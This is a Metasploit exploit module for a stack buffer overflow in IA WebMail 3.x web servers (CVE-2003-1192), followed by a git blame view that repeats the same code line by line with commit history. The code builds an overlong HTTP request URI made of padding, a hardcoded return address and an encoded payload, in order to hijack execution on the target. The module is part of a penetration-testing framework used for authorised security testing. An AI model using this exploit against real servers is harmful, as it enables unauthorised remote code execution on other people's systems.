metasploit-framework/modules/exploits/windows/http/ia_webmail.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IA WebMail 3.x Buffer Overflow',
      'Description'    => %q{
          This exploits a stack buffer overflow in the IA WebMail server.
        This exploit has not been tested against a live system at
        this time.
      },
      'Author'         => [ 'hdm' ],
      'References'     =>
        [
          [ 'CVE', '2003-1192'],
          [ 'OSVDB', '2757'],
          [ 'BID', '8965'],
          [ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'IA WebMail 3.x',
            {
              'Ret'    => 0x1002bd33,
              'Length' => 1036
            },
          ]
        ],
      'DisclosureDate' => 'Nov 3 2003',
      'DefaultTarget'  => 0))
  end

  def exploit
    print_status("Sending request...")

    send_request_raw({
      'uri' =>
        "/" + ("o" * target['Length']) +
        "META" +
        [target.ret].pack('V') +
        payload.encoded
    }, 2)

    handler
  end
end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`
ia webmail port, not tested git-svn-id: file:///home/svn/framework3/trunk@4009 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-03 05:42:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
ia webmail port, not tested git-svn-id: file:///home/svn/framework3/trunk@4009 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-03 05:42:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'IA WebMail 3.x Buffer Overflow',`
			`'Description' => %q{`
			`This exploits a stack buffer overflow in the IA WebMail server.`
			`This exploit has not been tested against a live system at`
			`this time.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'References' =>`
			`[`
			`[ 'CVE', '2003-1192'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '2757'],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'BID', '8965'],`
			`[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[`
			`'IA WebMail 3.x',`
			`{`
			`'Ret' => 0x1002bd33,`
			`'Length' => 1036`
			`},`
			`]`
			`],`
			`'DisclosureDate' => 'Nov 3 2003',`
			`'DefaultTarget' => 0))`
			`end`
ia webmail port, not tested git-svn-id: file:///home/svn/framework3/trunk@4009 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-03 05:42:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`print_status("Sending request...")`
ia webmail port, not tested git-svn-id: file:///home/svn/framework3/trunk@4009 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-03 05:42:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`send_request_raw({`
			`'uri' =>`
			`"/" + ("o" * target['Length']) +`
			`"META" +`
			`[target.ret].pack('V') +`
			`payload.encoded`
			`}, 2)`
ia webmail port, not tested git-svn-id: file:///home/svn/framework3/trunk@4009 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-03 05:42:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`end`
Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`